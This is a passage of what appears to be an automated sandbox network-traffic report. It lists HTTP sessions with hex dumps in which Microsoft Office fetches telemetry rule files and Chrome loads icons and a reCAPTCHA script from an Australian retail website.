                                                                                                                                                                                                            Data Ascii: 06 10.0941C75.6411 9.85145 75.4828 9.5244 75.0819 9.40835M35.9631 13.8182C30.8359 19.5046 29.6015 17.8588 29.6015 17.8588C28.2512 16.5928 31.2051 13.9237 31.2051 13.9237C35.7099 10.1574 36.6699 12.0353 36.6699 12.0353C37.1236 12.7949 35.9736 13.8182 35.97
                                                                                                                                                                                                            2024-11-06 05:29:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            47192.168.2.45771313.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:44 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:44 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:44 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                                            x-ms-request-id: 764b7f95-c01e-00a1-1c00-2d7e4a000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052944Z-16547b76f7fj897nhC1DFWdwq400000005y000000000p719
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:44 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            48192.168.2.45771513.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:44 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:44 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                                            x-ms-request-id: 1e45a1cf-401e-0029-3ef1-2c9b43000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052944Z-16547b76f7fsjlq8hC1DFWehq000000005vg00000000qpg7
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:44 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            49192.168.2.45771613.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:44 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:44 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 428
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                                            x-ms-request-id: 9f11ee7d-201e-0096-73f2-2cace6000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052944Z-16547b76f7fnm7lfhC1DFWkxt400000005zg00000000ra9t
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:44 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            50192.168.2.45771213.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:44 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:44 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:44 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9748630E"
                                                                                                                                                                                                            x-ms-request-id: cc46dee9-d01e-007a-0efd-2cf38c000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052944Z-16547b76f7f67wxlhC1DFWah9w000000065g00000000a0ay
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:44 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            51192.168.2.45771413.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:44 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:44 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 404
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                                            x-ms-request-id: d33e01be-001e-0082-0958-2e5880000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052944Z-15869dbbcc6bdtw9hC1DFWqyfw000000015000000000hke8
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:44 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            52192.168.2.457719162.159.140.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:45 UTC654OUTGET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-magnifier.svg HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:45 UTC587INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:45 GMT
                                                                                                                                                                                                            Content-Type: image/svg+xml
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                            last-modified: Tue, 29 Oct 2024 09:12:43 GMT
                                                                                                                                                                                                            etag: W/"304-62599fcdf98c0-gzip"
                                                                                                                                                                                                            x-vhost: publish-elders
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            Age: 46913
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-dfw-kdfw8210175-DFW
                                                                                                                                                                                                            x-cache: MISS
                                                                                                                                                                                                            x-timer: S1730285979.712973,VS0,VS0,VE682
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b00a4a4c6b97-DFW
                                                                                                                                                                                                            2024-11-06 05:29:45 UTC779INData Raw: 33 30 34 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 30 22 20 68 65 69 67 68 74 3d 22 32 31 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30 20 32 31 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 31 39 2e 30 30 30 37 20 31 39 2e 39 39 39 38 4c 31 32 2e 30 39 36 37 20 31 33 2e 30 39 35 38 4d 31 32 2e 30 39 36 37 20 31 33 2e 30 39 35 38 43 31 32 2e 37 30 39 34 20 31 32 2e 34 39 34 32 20 31 33 2e 31 39 36 39 20 31 31 2e 37 37 37 33 20 31 33 2e 35 33 30 39 20 31 30 2e 39 38 36 33 43 31 33 2e 38 36 34 39 20 31 30 2e 31 39 35 33 20 31 34 2e 30 33 39 20 39 2e 33 34 36 20 31 34 2e 30 34 32 39 20 38 2e 34 38 37 33 39 43 31 34 2e
                                                                                                                                                                                                            Data Ascii: 304<svg width="20" height="21" viewBox="0 0 20 21" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M19.0007 19.9998L12.0967 13.0958M12.0967 13.0958C12.7094 12.4942 13.1969 11.7773 13.5309 10.9863C13.8649 10.1953 14.039 9.346 14.0429 8.48739C14.
                                                                                                                                                                                                            2024-11-06 05:29:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            53192.168.2.457720172.66.0.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:45 UTC434OUTGET /etc.clientlibs/el/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.js HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:45 UTC598INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:45 GMT
                                                                                                                                                                                                            Content-Type: application/javascript;charset=utf-8
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            cache-control: public, max-age=2592000, immutable
                                                                                                                                                                                                            last-modified: Thu, 29 Feb 2024 03:45:04 GMT
                                                                                                                                                                                                            etag: W/"0-2386f26fb1bdc0"
                                                                                                                                                                                                            x-vhost: publish
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            Age: 486840
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31557600
                                                                                                                                                                                                            X-Served-By: cache-dfw-kdfw8210161-DFW
                                                                                                                                                                                                            X-Cache: HIT
                                                                                                                                                                                                            X-Timer: S1709578051.675756,VS0,VS0,VE1
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b00a8d962cc0-DFW


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            54192.168.2.457718172.217.16.1964432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:45 UTC499OUTGET /recaptcha/api.js?render=6LcVfMUkAAAAAEztwcBFPpzCQQaiMDwAGyboUKaF HTTP/1.1
                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:45 UTC749INHTTP/1.1 200 OK
                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                            Expires: Wed, 06 Nov 2024 05:29:45 GMT
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:45 GMT
                                                                                                                                                                                                            Cache-Control: private, max-age=300
                                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                            Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                            Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                            Server: ESF
                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            2024-11-06 05:29:45 UTC629INData Raw: 35 62 63 0d 0a 2f 2a 20 50 4c 45 41 53 45 20 44 4f 20 4e 4f 54 20 43 4f 50 59 20 41 4e 44 20 50 41 53 54 45 20 54 48 49 53 20 43 4f 44 45 2e 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 77 3d 77 69 6e 64 6f 77 2c 43 3d 27 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 27 2c 63 66 67 3d 77 5b 43 5d 3d 77 5b 43 5d 7c 7c 7b 7d 2c 4e 3d 27 67 72 65 63 61 70 74 63 68 61 27 3b 76 61 72 20 67 72 3d 77 5b 4e 5d 3d 77 5b 4e 5d 7c 7c 7b 7d 3b 67 72 2e 72 65 61 64 79 3d 67 72 2e 72 65 61 64 79 7c 7c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 28 63 66 67 5b 27 66 6e 73 27 5d 3d 63 66 67 5b 27 66 6e 73 27 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 66 29 3b 7d 3b 77 5b 27 5f 5f 72 65 63 61 70 74 63 68 61 5f 61 70 69 27 5d 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67
                                                                                                                                                                                                            Data Ascii: 5bc/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.g
                                                                                                                                                                                                            2024-11-06 05:29:45 UTC846INData Raw: 56 2b 78 4e 45 43 50 64 4c 42 56 65 59 66 66 78 72 4d 38 54 6d 5a 54 36 52 41 72 57 47 51 56 43 4a 30 4c 52 69 76 44 37 67 6c 63 41 55 41 41 41 43 51 65 79 4a 76 63 6d 6c 6e 61 57 34 69 4f 69 4a 6f 64 48 52 77 63 7a 6f 76 4c 32 64 76 62 32 64 73 5a 53 35 6a 62 32 30 36 4e 44 51 7a 49 69 77 69 5a 6d 56 68 64 48 56 79 5a 53 49 36 49 6b 52 70 63 32 46 69 62 47 56 55 61 47 6c 79 5a 46 42 68 63 6e 52 35 55 33 52 76 63 6d 46 6e 5a 56 42 68 63 6e 52 70 64 47 6c 76 62 6d 6c 75 5a 7a 49 69 4c 43 4a 6c 65 48 42 70 63 6e 6b 69 4f 6a 45 33 4e 44 49 7a 4e 44 49 7a 4f 54 6b 73 49 6d 6c 7a 55 33 56 69 5a 47 39 74 59 57 6c 75 49 6a 70 30 63 6e 56 6c 4c 43 4a 70 63 31 52 6f 61 58 4a 6b 55 47 46 79 64 48 6b 69 4f 6e 52 79 64 57 56 39 27 3b 69 66 28 76 26 26 76 2e 63 6f 6f
                                                                                                                                                                                                            Data Ascii: V+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.coo
                                                                                                                                                                                                            2024-11-06 05:29:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            55192.168.2.457721162.159.140.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:45 UTC649OUTGET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-cart.svg HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
